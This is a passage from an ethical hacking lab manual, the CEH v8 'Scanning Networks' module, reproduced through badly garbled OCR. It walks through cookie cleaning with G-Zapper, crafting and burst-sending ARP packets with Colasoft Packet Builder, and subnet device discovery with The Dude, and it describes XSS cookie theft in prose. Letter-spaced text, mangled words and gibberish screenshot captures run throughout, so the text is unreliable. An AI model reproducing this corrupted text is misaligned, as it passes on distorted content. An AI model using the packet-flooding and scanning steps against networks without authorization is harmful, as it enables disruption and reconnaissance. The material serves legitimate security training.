(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 AM(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data \Default\Cookies Friday, August 31, 2012 11:04:20 AM (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 AM(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox \Profiles\5vcc40ns.default\cookies.sqlite Wednesday, September 05, 2012 02:52:38 PM|
S ' Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
F IG U R E 16.9: D e le te d log s R e p o rt
L a b A n a l y s i s
D o c u m e n t a l l t h e I P a d d re s s e s , o p e n p o r t s a n d r u n n in g a p p l ic a t io n s , a n d p r o t o c o ls
y o u d is c o v e r e d d u r i n g d ie la b .
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 248
M odule 03 - S can n in g N e tw o rk s
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
G ־ Z a p p e r
A c t i o n P e r f o r m e d :
■ D e t e c t d i e c o o k ie s
■ D e l e t e t h e c o o k ie s
■ B l o c k t h e c o o k ie s
R e s u l t : D e l e t e d c o o k ie s a r e s t o r e d i n
C : \ U s e r s \ A d m i n i s t r a t o r \ A p p l i c a t i o n D a t a
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. E x a m in e h o w G - Z a p p e r a u t o m a t ic a l l y c le a n s G o o g le c o o k ie s .
2 . C h e c k t o see i f G - z a p p e i is b lo c k in g c o o k ie s o n s ite s o t h e r t h a n G o o g le .
I n t e r n e t C o n n e c t i o n R e q u i r e d
e s0 Y
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m
□ N o
□ iL a b s
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 249
M odule 03 - S can n in g N e tw o rk s
Lab
Scanning th e N etw ork Using th e C olasoft P acket BuilderThe Colasoft Packet Builder is a useful tool for creating custom netirork packets.
L a b S c e n a r i o
11 1 d i e p r e v io u s la b y o u h a v e le a r n e d l i o w y o u c a n d e te c t , d e le te , a n d b l o c k c o o k ie s .
A t t a c k e r s e x p lo i t d ie X S S v u ln e r a b i l i t y , w h i c h in v o lv e s a n a t t a c k e r p u s h in g
m a l ic io u s J a v a S c r ip t c o d e i n t o a w e b a p p l ic a t io n . W h e n a n o d ie r u s e r v is i t s a p a g e
w i d i d i a t m a l ic io u s c o d e i n i t , d ie u s e r ’ s b r o w s e r w i l l e x e c u te d ie c o d e . T h e b r o w s e r
l ia s 110 w a y o f t e l l i n g th e d i f f e r e n c e b e tw e e n le g i t im a t e a n d m a l ic io u s c o d e . I n je c t e d
c o d e is a n o d ie r m e c h a n is m d i a t a n a t t a c k e r c a n u s e f o r s e s s io n h i ja c k in g : b y d e f a u l t
c o o k ie s s t o r e d b y th e b r o w s e r c a n b e r e a d b y J a v a S c r ip t c o d e . T h e in je c t e d c o d e c a n
r e a d a u s e r ’ s c o o k ie s a n d t r a n s m i t d io s e c o o k ie s t o d ie a t t a c k e r .
A s a n e x p e r t eth ica l hacker a n d penetration te s te r y o u s h o u ld b e a b le t o p r e v e n t
s u c h a t t a c k s b y v a l id a t in g a l l h e a d e r s , c o o k ie s , q u e r y s t r in g s , f o r m f ie ld s , a n d h id d e n
f ie ld s , e n c o d in g i n p u t a n d o u t p u t a n d f i l t e r m e ta c h a r a c te r s i n t h e i n p u t a n d u s in g a
w e b a p p l i c a t io n f i r e w a l l t o b l o c k t h e e x e c u t io n o f m a l ic io u s s c r ip t .
A n o d i e r m e t h o d o f v u ln e r a b i l i t y c h e c k in g is t o s c a n a n e t w o r k u s in g th e C o la s o f t
P a c k e t B u i ld e r . 111 t h is la b , y o u w i l l b e le a r n a b o u t s n i f f i n g n e t w o r k p a c k e ts ,
p e r f o r m in g A R P p o is o n in g , s p o o f i n g t h e n e t w o r k , a n d D N S p o is o n in g .
L a b O b j e c t i v e s
T h e o b je c t i v e o f d i i s la b is t o r e in f o r c e c o n c e p t s o f n e t w o r k s e c u r i t y p o l i c y , p o l i c y
e n f o r c e m e n t , a n d p o l i c y a u d its .
L a b E n v i r o n m e n t
11 1 d i i s la b , y o u n e e d :
■ C o la s o f t P a c k e t B u i l d e r lo c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A c o m p u t e r r u n n i n g W indows Server 2012 as h o s t m a c h in e
I C O N K E Y
V a lu a b le
in f o r m a t io n
T e s t y o u r
k n o w le d g e
Q W e b e x e rc is e
Q W o r k b o o k r e v ie w
^TToo ls dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 250
M odule 03 - S can n in g N e tw o rk s
■ W indow 8 r u n n i n g o n v i r t u a l m a c h in e as ta r g e t m a c h in e
■ Y o u c a n a ls o d o w n lo a d d i e la te s t v e r s io n o f Advanced Colasoft Packet Builder f r o m d ie l i n k
h t t p : / / w w w . c o la s o f t . c o m / d o w n l o a d / p r o d u c t s / d o w n lo a d _ p a c k e t _ b u i l d e r .
p h p
■ I f y o u d e c id e t o d o w n lo a d d ie la tes t version, d ie n s c r e e n s h o ts s h o w n i n
d ie la b m i g h t d i f f e r .
■ A w e b b r o w s e r w i d i I n t e r n e t c o n n e c t i o n n u u i i n g i n h o s t m a c l i i n e
L a b D u r a t i o n
T im e : 1 0 M in u t e s
O v e r v i e w o f C o l a s o f t P a c k e t B u i l d e r
Colasoft Packet Builder c re a te s a n d e n a b le s c u s t o m n e t w o r k p a c k e ts . T h i s t o o l c a n
b e u s e d t o v e r i f y n e t w o r k p r o t e c t i o n a g a in s t a t t a c k s a n d in t r u d e r s . C o la s o f t P a c k e t
B u i l d e r fe a tu r e s a d e c o d in g e d i t o r a l l o w in g u s e rs t o e d i t s p e c i f ic p r o t o c o l f i e l d v a lu e s
m u c h e a s ie r .
U s e r s a r e a ls o a b le t o e d i t d e c o d in g i n f o n n a t i o n i n t w o e d i t o r s : Decode Editor a n d
Hex Editor. U s e r s c a n s e le c t a n y o n e o f d i e p r o v id e d te m p la te s : Ethernet Packet, IP Packet, ARP Packet, o r TCP Packet.
L a b T a s k s
1. I n s t a l l a n d l a u n c h d ie Colasoft Packet Builder.
2 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r o n t h e l o w e r - l e f t
c o r n e r o f t h e d e s k t o p .
S t a s k 1
ScanningNetw ork
F IG U R E 17.1: W in d o w s Se rve r 2012 - D esk to p v iew
3 . C l i c k t h e C olaso ft Packe t B u ilde r 1.0 a p p t o o p e n t h e C olasoftQ y <“ Y o u can d o w n lo ad P acker B u ilde r w i n d o wC o la s o ft P a c k e t B u ild e r fro mh ttp : / /w w w . co la so ft. com .
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 251
M odule 03 - S can n in g N e tw o rk s
AdministratorS t a r t
Sew WindowsPowerSM
GoogteChrome
Cotaoft Pacto?! Bunder t.O
Es m * * *
compule r control1'and Manager
v
Mochn#.
*J V 9 1 9
eCommandPrompt
U3LWv«r Irn-.aljt 0י־ Center.
MfrtjpaC* Studc
te r V 3s- e .
MeuMa r»efax
Nnwp7«ftmapGUI
CMtoo $ o
F IG U R E 17.2 W in d o w s Se rve r 2012 - A p p s
4 . T h e C o la s o f t P a c k e t B u i l d e r m a in w i n d o w a p p e a rs .
Colasoft Packet Builder ־ ־ 1- =1 ך
Fie Edt Send Help !# ^ 1
ImportS ?’ & 1Add Insert
♦Checksum[As J 55
Adapter Colasoft4 $ Oecode Edro*־ Packet No. No pxkec elected: \$ Packet Lilt Packets 0 Selected 0 1
Delta Time Sourer
fatal 0 byte* |
<L
F IG U R E 17.3: C o laso ft Packe t B u ild e r m ain screen
^ He«Edfcor>0:0
5 . B e f o r e s t a r t in g o f y o u r ta s k , c h e c k t h a t d ie Adapter s e t t in g s a re s e t t o
d e f a u l t a n d d i e n c l i c k OK.
O p e ra tin g system req u irem en ts:
W in d o w s S e rv e r 2003 an d 64-bit E d itio n
W in d o w s 2008 an d 64-bit E d itio n
W in d o w s 7 and 64-b it E d itio n
*Select Adapter
Adapter:
D 4 :BE:D 9:C3:CE:2D 0 100.0 l* )p s 1500 bytes10.0.0.7/255.255.255.010.0.0.1 O perational
Physical Address Link Speed Max Fram e Size IP Address Default Gatew ay Adapter Status
HelpCancelOK
F IG U R E 17.4: C o laso ft Packe t B u ild e r A d ap ter settings
Eth ica l Hacking and Countermeasures Copyright <0 by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 252
M odule 03 - S can n in g N e tw o rk s
6. T o a d d 0 1 c re a te d ie p a c k e t , c l i c k Add 111 d i e m e n u s e c t io n .
File Edit Send Help
f f 01 Import Export־״־ Add Insert
[ ^ Decode Editor
F IG U R E 17.5: C o laso ft Packe t B u ild e r creating d ie packet
7 . W h e n a n Add Packet d ia lo g b o x p o p s u p , y o u n e e d t o s e le c t d ie t e m p la te
a n d c l i c k OK.
n־ nAdd Packet
ARP Packet
Second0.1
Select Template:
Delta Time:
HelpCancelOK
T h e re are tw o w ays to crea te a p a ck e t - A d d an d In s e rt. T h e d iffe re n ce b e tw een th ese is th e n e w ly ad d ed p ack e t's p o s itio n in th e P a c k e t L is t. T h e n ew p ack e t is lis te d as th e la s t p ack e t in th e lis t i f added b u t a fte r th e cu rre n t p ack e t i f in se rted .
Q c o la s o f t P a c k e t B u ild e r su p p o rts * .c s cp k t (C ap sa 5.x and 6 .x P a c k e t F ile ) a n d * c p f (C ap sa 4.0 P a c k e t F ile ) fo rm a t. Y o u m ay a lso im p o rt data fro m ״ .cap (N e tw o rk A sso c ia te s S n iffe r p ack e t file s ), * .p k t (E th e rP e e k v 7 / T o k e n P e e k / A 1 ro Pe ek v9 / O m n iP e e k v 9 p ack e t file s ), * .d m p (T C P D U M P ), an d * ra w p k t (ra w p ack e t file s ).
F IG U R E 17.6: C o laso ft Packe t B u ild e r A d d Packet d ia log box
8 . Y o u c a n v iew d ie a d d e d p a c k e ts l i s t 0 11 y o u r r i g h t - h a n d s id e o f y o u r
w in d o w .
S t a s k 2
Decode Editor
9 . C o la s o f t P a c k e t B u i l d e r a l lo w s y o u t o e d i t d ie decoding i n f o r m a t i o n i n d ie
t w o e d i t o r s : Decode Editor a n d Hex Editor.
Packet List Packets 1 Selected 1
_______ Usl______ Delta Tims . S o u rc e D e s t in a t io n _______,
1 0.100000 00:00:00:00:00:00
F IG U R E 17.7: C o laso ft Packe t B u ild e r Packet L is t
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 253
M odule 03 - S can n in g N e tw o rk s
Decode EditorPacket: Num:000001 Length:64 Captured:•
B-© Ethernet Type I I [0/14]lestination Address: FF:FF:FF:FF:FF:FF [0/6]
J© Source Address: 00:00:00:00:00:00 [6/6]j ! ^ P ro to c o l: 0x0806 (ARP) [12.- sj ARP - Address Resolution Protocol [14/28]
!••••<#> Hardware type: 1 (Ethernet):Protocol Type ץ#( ! 0x0800 [16/2]
j..© Hardware Address Length: 6 [18/1]:Protocol Address Length ©..ן 4 [19/1]
! |—<#1ype: 1 (ARP Reque.\ - J>S0urce Physics: 00:00:00:00:00:00 [22/6]
j3 Source IP ״ : 0.0.0.0 [28/4]Destination Physics: 00:00:00:00:00:00 [32/6]
j Destination IP : 0.0.0.0 [38/4]- •© Extra Data: [42/18]
Number of Bytes: FCS:
18 bytes [42/18]
L # FCS: 0xF577BDD9
■<l— 111 j ...... ; ......,.... ....־ J <״
Q B u s t M o d e O p tio n : I f y o u ch e ck th is o p tio n , C o la s o ft P a c k e t B u ild e r sends p ack e ts o n e a fte r an o th e r w ith o u t in te rm iss io n . I f yo u w a n t to send p ackets a t th e o rig in a l d e lta tim e , d o n o t ch e ck th is o p tio n .
F IG U R E 17.8: C o laso ft Packe t B u ild e r D eco d e E d ito r
^ Hex Editor Total 60 bytes0000 FF FF FF FF FF FF 00 00 00 00 00 00 08 06000E 00 01 08 00 06 04 00 01 00 00 00 00 00 00001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00002A 00 00 00 00 00 00 00 00 00 00 00 00 00 000038 00 00 00 00 . . . .
V
F IG U R E 17.9: C o laso ft Packe t B u ild e r H e x E d ito r
1 0 . T o s e n d a l l p a c k e ts a t o n e t im e , c l i c k Send All f r o m d ie m e n u b a r .
1 1 . C h e c k d ie Burst Mode o p t i o n i n d ie Send All Packets d ia lo g w i n d o w , a n d
d i e n c l i c k Start.
רC o la s o ft C a p saPacket Analyzer
^4Send AllSendChecksumJown
1 Packet List Packets 1 Selected 1No. Delta Time Source Destination
1 0.100000 00:00:00:00:00:00 FF:FF:FF:FF:FF:FF
£ 0 1 O p tio n , L o o p Sen d in g : T h is d e fin e s th e rep eated tim es o f th e sen d in g e x e cu tio n , o n e tim e in d e fa u lt. P le a se e n te r z e ro i f y o u w a n t to keep sen d in g p ack e ts u n til y o u pause o r s to p it m an u ally .
F IG U R E 17.10: C o laso ft Packet B u ild e r Send A ll bu tton
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 254
M odule 03 - S can n in g N e tw o rk s
£ 3 S e le c t a p ack e t fro m th e p ack e t lis tin g to ac tiva te S e n d A ll b u tto n
F IG U R E 17.11: C o h so ft Packe t B u ild e r Send A H Packets
1 2 . C l i c k Start
Send All Packets
Select...
loops (zero for in fin ite loop)
m illiseconds
O ptions
A d ap ter: R ea ltek P C Ie G8E Fam rfy Controller
□ Bu rst M ode (no d elay betw een packets)
□ Loop Sen d n g : 1 A-
1000 A-D elay Betw een Loops: 1000
Sending Inform ation
Total Packets: 1
Packets S e n t: 1
Progress:
HelpCloseStopS ta rt
£ 0 T h e p ro g ress b ar p re sen ts an o v e rv ie w o f th e sen d in g p ro cess yo u are engaged in a t th e m o m en t.
F IG U R E 17.12 C o laso ft Packe t B u ild e r Send A H Packets
1 3 . T o export d ie p a c k e ts s e n t f r o m d ie F i le m e n u , s e le c t
F ile־^E xp o rt־^A ll Packets.
Eth ica l Hacking and Countermeasures Copyright <0 by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 255
M odule 03 - S can n in g N e tw o rk s
״li י Colasר״
File Edit Send HelpImport... 1 * 0 1 a ׳ X
10 Export ► All Packets... glete
Exit ^ Selected Packets... ketNo. |_ jJ I+ T Packet: Num: 00(El••© Ethernet Type I I
^D estination Address: Source Address:
[0/14] ןFF:FF:1 00:00:( ,
F IG U R E 17.13: E x p o rt A ll Packets p o tio n
Save As x I
5a vein־ !"!:o laec-ft
f l f c l Nome D«tc modified TypeNo items match your search.
Rcccnt plocca
■Desktop
< 3Libraries
l A f f
Computer
Networkr n _______ ... [>1F1U n»m* | Fjiekct• e «cp ld v j Sav•
S»v• •c typ♦ (Colafloft Packot Rio (v6) (*.oocpkt) v | C«rc«l |
F IG U R E 17.14: Se lect a lo catio n to save the exported file
U
Packets.cscpkt
F IG U R E 17.15: C o laso ft Packe t B u ild e r exporting packet
L a b A n a l y s i s
A n a ly z e a n d d o c u m e n t d ie r e s u l ts r e la te d t o th e la b e x e rc is e .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
C o l a s o f t P a c k e t
B u i l d e r
A d a p t e r U s e d : R e a l t e k P C I e F a m i l y C o n t r o l l e r
S e l e c t e d P a c k e t N a m e : A R P P a c k e t s
R e s u l t : C a p t u r e d p a c k e t s a r e s a v e d i n p a c k e t s . c s c p k t
Q O p tio n , P a ck e ts S e n t T h is sh ow s th e n u m b er o f p ack e ts se n t su ccessfu lly . C o la s o ft P a c k e t B u ild e r d isp lays th e p ack e ts sent u n su ccessfu lly , to o , i f th e re is a p ack e t n o t sen t ou t.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 256
M odule 03 - S can n in g N e tw o rk s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. A n a ly z e h o w C o la s o f t P a c k e t B u i l d e r a f f e c ts y o u r n e t w o r k t r a f f i c w h i l e
a n a ly z in g y o u r n e t w o r k .
2 . E v a lu a t e w h a t t y p e s o f in s t a n t m e s s a g e s C a p s a m o n i t o r s .
3 . D e t e r m in e w h e t h e r d ie p a c k e t b u f f e r a f f e c t s p e r f o r m a n c e . I f y e s , t h e n w h a t
s te p s d o y o u ta k e t o a v o id o r r e d u c e i t s e f f e c t o n s o f tw a r e ?
I n t e r n e t C o n n e c t i o n R e q u i r e d
□ Y e s 0 N o
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m 0 iL a b s
Eth ical Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 257
M odule 03 - S can n in g N e tw o rk s
Lab
Scanning D evices in a N etw ork Using T he DudeThe Dnde automatically scans all devices within specified subnets, draws and lays out a wap of your networks, monitors services of your devices, and a/eftsyon in case some service has p roblems.
L a b S c e n a r i o
111 t h e p r e v i o u s la b y o u l e a r n e d h o w p a c k e t s c a n b e c a p t u r e d u s in g C o l a s o f t
P a c k e t B u i l d e r . A t t a c k e r s t o o c a n s n i f f c a n c a p t u r e a n d a n a ly z e p a c k e t s f r o m a
n e t w o r k a n d o b t a i n s p e c i f i c n e t w o r k i n f o r m a t i o n . T h e a t t a c k e r c a n d i s r u p t
c o m m u n i c a t i o n b e t w e e n h o s t s a n d c l ie n t s b y m o d i f y i n g s y s t e m c o n f i g u r a t i o n s ,
o r t h r o u g h t h e p h y s ic a l d e s t r u c t i o n o f t h e n e t w o r k .
A s a n e x p e r t e th ica l hacker, y o u s h o u ld b e a b le t o g a d i e r i n f o r m a t i o n 0 11
organ iza tions n e tw o rk to ch e ck fo r vu ln e ra b ilit ie s and f ix them before an a tta c k e r ge ts to com prom ise the m ach ines using those vu ln e ra b ilitie s . I f
y o u d e t e c t a n y a t t a c k t h a t h a s b e e n p e r f o r m e d 0 11 a n e t w o r k , i m m e d i a t e l y
i m p l e m e n t p r e v e n t a t i v e m e a s u r e s t o s t o p a n y a d d i t i o n a l u n a u t h o r i z e d a c c e s s .
111 t h i s l a b y o u w i l l l e a r n t o u s e T h e D u d e t o o l t o s c a n t h e d e v ic e s i n a n e t w o r k
a n d t h e t o o l w i l l a l e r t y o u i f a n y a t t a c k h a s b e e n p e r f o r m e d 0 11 t h e n e t w o r k .
L a b O b j e c t i v e s
T h e o b je c t i v e o f t h is la b is t o d e m o n s t r a t e h o w t o s c a n a l l d e v ic e s w i t h i n s p e c i f ie d
s u b n e ts , d r a w a n d l a y o u t a m a p o f y o u r n e t w o r k s , a n d m o n i t o r s e r v ic e s 0 11 d ie
n e t w o r k .
L a b E n v i r o n m e n t
T o c a r r y o u t t h e la b , y o u n e e d :
■ T h e D u d e is l o c a t e d a t D:\CEH-T0 0 ls\CEHv8 Module 03 Scanning N e tw orks \N e tw o rk D iscovery and Mapping Tools\The Dude
■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f The Dude f r o m t h e
h t t p : / / w w w . m i k r o t i k . c o m / t h e d u d e . p h p
I C O N K E Y
5 V a lu a b le
in f o r m a t io n
T e s t y o u r
k n o w le d g e
W e b e x e rc is e
W o r k b o o k r e v ie w
V—J Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 258
M odule 03 - S can n in g N e tw o rk s
■ I f y o u d e c id e t o d o w n l o a d t h e l a t e s t v e r s io n , t h e n screensho ts s h o w n
i n t h e l a b m i g h t d i f f e r
■ A c o m p u t e r r u n n i n g W i n d o w s S e r v e r 2 0 1 2
■ D o u b le - c l i c k d ie The Dude a n d f o l l o w w i z a r d - d r iv e n in s t a l l a t i o n s te p s t o
in s t a l l The Dude
■ A d m in i s t r a t i v e p r iv i le g e s t o r u n t o o ls
L a b D u r a t i o n
T im e : 1 0 M in u t e s
O v e r v i e w o f T h e D u d e
T h e D u d e n e t w o r k m o n i t o r is a n e w a p p l i c a t io n d i a t c a n d r a m a t ic a l ly i m p r o v e d ie
w a y y o u m a n a g e y o u r n e t w o r k e n v i r o n m e n t I t w i l l a u t o m a t ic a l l y s c a n a l l d e v ic e s
w i t h i n s p e c i f ie d s u b n e ts , d r a w a n d la y o u t a m a p o f y o u r n e t w o r k s , m o n i t o r s e r v ic e s
o f y o u r d e v ic e s , a n d a le r t y o u i n c a s e s o m e s e r v ic e l ia s p r o b le m s .
L a b T a s k s
1 . L a u n c h t h e S ta rt m e n u b y h o v e r i n g t h e m o u s e c u r s o r o n t h e l o w e r - l e f t
c o r n e r o f t h e d e s k t o p .
i | Windows Server 2012
Ser*? 2012 M«a1e CandWate DitaceM*____________________________________________________________________________Ev mbonoopy Build WX:
F IG U R E 18.1: Windows Server 2012 - Desktop view
1 1 1 t h e S ta rt m e n u , t o l a u n c h The Dude, c l i c k The Dude i c o n .
S t a r t Administrator ^
Server Computer Maiwgcr Onm SS?b U * f>
~ ev - —1 י יM m n t t r . command T<xJ1 Prompi
1n»0u0f
0—l»p
%
E t a s k 1
Launch The Dude
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 259
M odule 03 - S can n in g N e tw o rk s
F IG U R E 182: W in d o w s Se rve r 2012 - S ta rt m enu
3 . T h e m a in w i n d o w o f The Dude w i l l a p p e a r .
f S m m admin@localhost - The Dude 4.0beta3 ’ - l ° l X י
(§) 5references 9 Local Server H d o j j y i 2 m c * ״ mSetting* CJ
Contert* 7 1 S E 1 O * Ssttnst j Cikovot *70011 W .•־ ־.*. Lay* irk( V J□ A3<*T3S USSA Admn#
H 0 «ו«יH D*wic«»?5? Flea □ Functona
5
M Htfay Action* H Lntu □ Lc0*
£7£7 Cecusem׳& £7
- A
£7 Syslog E Notic?
- B Keftroric Maps B Lccd
t- ! U n i r t i J
[.Ca 1MU«d Cterl. w Uj« /U 334 bw« S* ״*־ ׳ x215bc*.'UM2bc«
F IG U R E 18.3: M a in w in d o w o f T h e D u d e
4 . C l i c k t h e D iscover b u t t o n o n t h e t o o l b a r o f d i e m a in w i n d o w .
---- -------------- — ■■admin@localhost - The Dude 4.0beta3 . ״1
3 E ®
x
® 5reference* 9 Local Seiver *b r h t Z
a c ׳ * IIIIJH b
Ca-ite־׳!* + -1״ o * Sottrco Dkov*־ | *Too• ?יי׳ v• .•־ |lrk* _d 2
Q Addra# list*A ׳vamro
□ 0 יו*וf־“l OmiaNf * . Ftea f=1 F_nccon8 יB Haay Action*n “*י1 □ Legs
£ ? ActJcn£7 Defcus £7 Event£7 Sjobg
R Mb No tie?- Q Network Maos
B LccdlM ׳'
| !Corrected Cfert. ix $59 bus /tx 334 bp* :«<* a215bc«<'u642bc«
F IG U R E 18.4: Se lect d iscover button
5 . T h e Device D iscovery w i n d o w a p p e a r s .
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 260
M odule 03 - S can n in g N e tw o rk s
Device Discovery
DiscoverGeneral Services Device Types Advanced
CancelEnter subnet number you want to scan for devices
Scan Networks: 110.0.0.0/24
! -Agent: |P£g? P Add Networks To Auto Scan
Black List: |1
Device Name Preference: |DNS. SNMP. NETBIOS. IPDiscovery Mode: (• fast (scan by ping) C reliable (scan each service)
I I I I I I I I2 4 6 8 10 14 20 50
Recursive Hops: / ו י י ־ ר פ
F Layout Map /tfter Discovery Complete
F IG U R E 18.6: D e v ic e d iscovery w in d o w
6 . 111 t h e D e v i c e D i s c o v e r y w i n d o w , s p e c i f y Scan N e tw orks r a n g e , s e le c t
d e fa u lt f r o m d i e A gent drop-dow n l i s t , s e le c t DNS, SNMP, NETBIOS.a n d IP f r o m d i e Device Name P re ference d r o p - d o w n l i s t , a n d c l i c k
Discover.
Device Discovery
number you want to scan for
General Services Device Types Advanced
Scan Networks: (10.0.0.0/24
Agent: 5 S S H B I r Add Networks To Auto Scan
Black List: [none
3DNS. SNMP. NETBIOS. IPDevice Name PreferenceDiscovery Mode (• fast (scan by ping) C reliable (scan each service)
0Recursive Hops: [1 ]▼] /—r ר—ו—1—1—1---------------------------------------------------------------------------------------1—1—ז
2 4 6 8 10 14 20 SO
I- Layout Map /tfter Discovery Complete
F IG U R E 18.7: Se lectin g device nam e p reference
7 . O n c e t h e s c a n is c o m p le t e , a l l t h e d e v ic e s c o n n e c t e d t o a p a r t i c u l a r
n e t w o r k w i l l b e d is p la y e d .
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 261
M odule 03 - S can n in g N e tw o rk s
f־ t ^tadrmn@localhost The Dude 4.0beta3
+-_ C: _e [o * | Secpy I | Dhcovef | Tooia tt 1 a s -י |l־ks ^ 209m: [1011 d Locd •fat!_ 11 ■ sSanhfla
. t •WIN.D39MR5HLSE-: AOMN
\ Iי * N. י
win ? U 't '. ic . ' . - t fs \
ז ר ב - נ ^ א ו
QyWW*IXY858KH04P
(DU I9 N tncn t 63 % vM: 27% disk 75%
rMflMMtttLCXUUl
VI1hK.K0H)1m3M
____________Ccrtemtf~l *ricteo Lata .4 Adnns
□ 2« *<B Chats ק
□ Oevteaa Pie* ׳*-Q Fu1dion»
0 4*07 *et10n» H 1׳*י״-□ -י00»
£7 6י•L f Uofcoa L?rv«n1a s y * B□ tob >10 «m
d n *ס״״^־ז Map*Q Local
ק r־fcnwortc»Q NotActfont
H □ PjTriSQ adrrin 127.0,0.1
Q P t 638 5> Sennco Q T c d e
Saver r 1 ( ( 4 (>> * 3 9 t®c«Qm- ׳x ׳■325 oc« ׳ w I 95bpj
F I G U R E 1 8 .8 : O v e r v i e w o f n e t w o r k c o n n e c t i o n
8. Select a device and place d ie mouse cursor on i t to display the detailed in fo rm a tio n about d ia t device.
~*1 Zoom. [TO♦• ״ % j o StfttKujo Dwovw
t f t t e O T . JLYKSO-Ci P Wrdcvnaxnpucr‘,IP• 100 0 9MAC Ctt ■ - 10S*'42m (7VU > i1Q r«0 0 a 1C2 coj fn&nory vrtuai memoiy. cfck SjcrT!־״.ז*. vw.-’.׳-Y35am3ipCesacto- -fc*».=«e ntes« Famly G Wsdd 42 9eppng 7 M/M COUPATBU - V irc0*5 I t o ia i 6 & End6001 WipxnsrFix)Ipwue 0028־<J771
)>«• n-n■ • •:י uUCMKJP1ג4> »נוiwttdai e UU liriMMOll-
J ? * I? •#I !_•« a M■ «L'
1*•: 13: ta■ . W * .־ n m t «W ,־ -ll־r8!a.H0TP
12:40 12: X| mdiv 0 vnn-uiYKBocnP
12:3 u:aI ecu •lam 0 «■ a.'iaaeoip
CartvM5 Ad<*«3a Lota A Admr*
R Afl*rta□ Chat*Q 08 V1008 ^ PleaQ Functions□ HatovV*•*®□ Lnk*
־ □ Lcoa]J? Acton C7 Detua £ ? E w r L 7 S « b g
BMb Mod*® rielwork Maps
B local n NHwwk•2 N9Ulc4B0r•Q ParrisH•*™ 127.00.1□ P׳cN»Q> SamcasH Tocte
n .1 5 4 ttp a /fc3 3 kb c«C V t m 245 Upa/tx 197bpa
F I G U R E 1 8 .9 : D e t a i l e d i n f o r m a t i o n o f t h e d e v ic e
9. N o w , c lick the dow n arrow fo r die Local d rop-dow n lis t to see in fo rm a tion on H is to ry A c tions , Tools, F iles. Logs, and so on.
Eth ica l Hacking and Countermeasures Copyright © by EC Counc11־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 262
M odule 03 - S can n in g N e tw o rk s
F I G U R E 1 8 .1 0 : S e le c t in g L o c a l i n f o r m a t i o n
10. Select options fro m die d rop-dow n lis t to v iew complete in fo rm ation ._־ < ־ X ־,adm!r1@iocalha5t ־ The Dude 4.0beta3
® | | Preferences | fr Local Swar Heb •O SetBngj e• I ~
Be׳nrfl dn1£1׳*d Be׳n»nt chanjed btmrU 1l»a•׳ B1׳־r*« changed blvw'i: Jw j*0 Bf«wm changed H»w1! (.11•׳ j«0 Bemem changed b cw : changtdBemem changed Be lt# ills' jeO Berotm changed0c1׳*s׳r. da'jedBeroen: changedBc1*׳T. cha'SedB fw t changed Bwnert chanoed Berne'S changed Bwmnl chr xl Beroen! changed
AdenNttwOlk Map Ner*e«k Map fJrtocik Map Netv«ak Map fM ow k Map Httitcik Map fM ocik Map Merwak Map fjnC*«k Map tkf mcik Map NttWClk Map lJer«e(k Map r«(.«c«k Map liefMCik Map ta t« a k MaptieCMdk MapNetwak Map I jefMCik Map heCaak Map Net־*c«k Map
, M S «
